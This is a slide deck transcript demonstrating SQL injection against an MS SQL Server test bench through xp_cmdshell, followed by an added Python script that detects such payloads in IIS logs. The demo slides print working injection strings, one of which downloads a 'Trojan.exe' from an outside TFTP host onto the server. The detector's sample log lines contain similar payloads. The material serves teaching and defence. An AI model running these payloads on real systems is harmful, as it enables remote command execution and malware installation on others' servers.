Sql injection exploit
![Page 1: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/1.jpg)
Advanced Exploitation using SQL Injection
By Varun Duggal
Works in the application security domain
![Page 2: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/2.jpg)
SQL Injection
The ability to inject SQL commands into the database engine through an existing application
SQL injection occurs when user-supplied data is sent to an interpreter as part of a command or query
Attackers trick the interpreter into executing unintended commands by supplying specially crafted data
Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application
![Page 3: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/3.jpg)
Vulnerable Applications
Almost all SQL databases and programming languages are potentially vulnerable
MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc.
Accessed through applications developed using:
Perl and CGI scripts that access databases
ASP, JSP, PHP
XML, XSL and XSQL
JavaScript
VB, MFC, and other ODBC-based tools and APIs
DB-specific web-based applications and APIs
Reports and DB applications
3GL- and 4GL-based languages (C, OCI, Pro*C, and COBOL)
and many more
![Page 4: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/4.jpg)
Stored Procedure
A stored procedure is a subroutine available to applications accessing a relational database system
Stored procedures (sometimes called a sproc or SP) are stored in the database's data dictionary
![Page 5: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/5.jpg)
Exploiting the Vulnerability
The xp_cmdshell extended stored procedure, which is built into MS SQL Server by default, allows users to execute operating system commands
![Page 6: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/6.jpg)
Tasks
Executing any type of OS command
Ping the server
Directory listing
Create a file
Defacing the website
Execute applications
Upload and download files
![Page 7: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/7.jpg)
More Stored Procedures
xp_cmdshell
xp_regread
xp_servicecontrol
xp_availablemedia
xp_enumdsn
xp_loginconfig
xp_makecab
xp_ntsec_enumdomains
xp_terminate_process
![Page 8: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/8.jpg)
Demo
Test Bench
OS: Windows XP Professional
Frontend: ASP
Backend: MSSQL 2000
Web Server: IIS 5.0
![Page 10: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/10.jpg)
Checking Whether It Is Vulnerable
Enter a single quote in the id parameter; the resulting error message indicates that it's vulnerable to SQL injection.
![Page 11: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/11.jpg)
Now open the URL and run the command:
`';exec master..xp_cmdshell "ipconfig > c:\inetpub\wwwroot\test.txt"--`
![Page 12: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/12.jpg)
Finally, the file is created on the web server; access that file as shown in the snapshot below:
![Page 13: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/13.jpg)
Upload a File to the Server
Start a TFTP server hosting the malicious code to be uploaded
![Page 14: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/14.jpg)
Now open the URL and run the command:
`';exec master..xp_cmdshell "tftp -i 192.168.1.5 GET Trojan.exe C:\Trojan.exe"--`
![Page 15: Sql injection exploit](https://reader030.fdocuments.net/reader030/viewer/2022013111/559aa7e71a28ab731c8b45e5/html5/thumbnails/15.jpg)
The TFTP server logs show the file being uploaded to the server.
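Every step of the demo above leaves a trace in the web server's request log: the quote-probe on the id parameter, then a stacked query calling an extended stored procedure from slide 7. The following detection script is an added example (not part of the deck) that scans constructed IIS W3C-format log lines, normalises URL encoding, and flags requests carrying `xp_*` procedure calls, rating them higher when the `';exec` stacked-query prefix from the demo is also present; the log format, field order and sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Extended stored procedures listed on slide 7; a call to any of them arriving
# inside a web request parameter is a strong indicator of injection.
XP_PROCS = ("xp_cmdshell", "xp_regread", "xp_servicecontrol", "xp_availablemedia",
            "xp_enumdsn", "xp_loginconfig", "xp_makecab", "xp_ntsec_enumdomains",
            "xp_terminate_process")
# Stacked-query prefix used in the demo: closing quote, statement separator, EXEC.
STACKED_EXEC = re.compile(r"""['"]\s*;\s*exec(?:ute)?\b""", re.IGNORECASE)
XP_CALL = re.compile(r"\b(?:master\s*\.\.\s*)?(" + "|".join(XP_PROCS) + r")\b", re.IGNORECASE)

def decode_query(raw, max_rounds=3):
    """URL-decode until the string stops changing, so layered encoding is normalised."""
    cur = raw
    for _ in range(max_rounds):
        nxt = unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur

def classify_request(query):
    """Return (severity, procs) for one cs-uri-query value."""
    q = decode_query(query)
    procs = sorted({m.group(1).lower() for m in XP_CALL.finditer(q)})
    sev = "none" if not procs else "high" if STACKED_EXEC.search(q) else "medium"
    return (sev, procs)

def scan_iis_log(lines):
    """Scan W3C lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    findings = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7 or fields[5] == "-":
            continue  # directive line, short line, or request without a query string
        date, time, ip, _method, stem, query, _status = fields[:7]
        sev, procs = classify_request(query)
        if sev != "none":
            findings.append({"time": f"{date} {time}", "src": ip, "uri": stem,
                             "severity": sev, "procs": procs})
    return findings

# Constructed sample log (not from the deck): a normal request, the single-quote
# probe from slide 10, the slide-11 payload, and a twice-encoded xp_regread call.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2022-01-31 10:00:01 10.0.0.7 GET /product.asp id=5 200
2022-01-31 10:00:09 10.0.0.7 GET /product.asp id=5' 500
2022-01-31 10:00:31 10.0.0.7 GET /product.asp id=5';exec+master..xp_cmdshell+%22ipconfig%22-- 200
2022-01-31 10:01:02 10.0.0.7 GET /product.asp id=5%2527%253Bexec%2Bmaster..xp_regread-- 200
""".splitlines()
```

The bare quote probe is deliberately not flagged on its own, since it is too noisy to alert on; correlating a 500 response with a later `xp_*` call from the same source is the more useful signal.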